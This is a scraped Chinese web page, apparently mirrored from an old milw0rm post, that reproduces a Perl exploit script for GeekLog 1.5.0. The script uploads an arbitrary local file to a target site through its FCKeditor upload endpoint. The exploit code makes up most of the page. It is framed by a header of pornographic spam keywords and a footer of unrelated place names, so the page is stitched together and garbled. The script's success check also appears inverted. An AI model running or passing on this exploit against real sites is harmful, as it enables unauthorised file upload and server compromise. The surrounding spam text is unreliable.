最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

GeekLog

互聯(lián)網(wǎng)   發(fā)布時間:2008-10-08 21:02:23   作者:佚名   我要評論
#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print <<INTRO; GeekLog <= 1.5.0 Remote Arbitrary File Upload
#!/usr/bin/perl use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common; print <<INTRO;

GeekLog <= 1.5.0 Remote Arbitrary File Upload

Discovered && Coded By: t0pP8uZz

0day?!?Most sites need custom configuration files
for this exploit to actually work, anyway enjoy

Discovered On: 20 August 2008 / milw0rm.com

Script Download: http://www.geeklog.net
INTRO print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);

print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>); my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] ); if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; } exit;

相關文章

最新評論

邢台县| 华蓥市| 余江县| 泽库县| 十堰市| 宁陵县| 克东县| 盐山县| 隆昌县| 西贡区| 上饶县| 娱乐| 杨浦区| 通江县| 江永县| 张北县| 石首市| 左贡县| 江北区| 中西区| 德钦县| 清丰县| 岗巴县| 迁安市| 桦南县| 临海市| 佛冈县| 留坝县| 阿坝县| 黑河市| 康定县| 旌德县| 建昌县| 清水县| 甘孜县| 涪陵区| 东丰县| 扎囊县| 温州市| 巴中市| 从江县|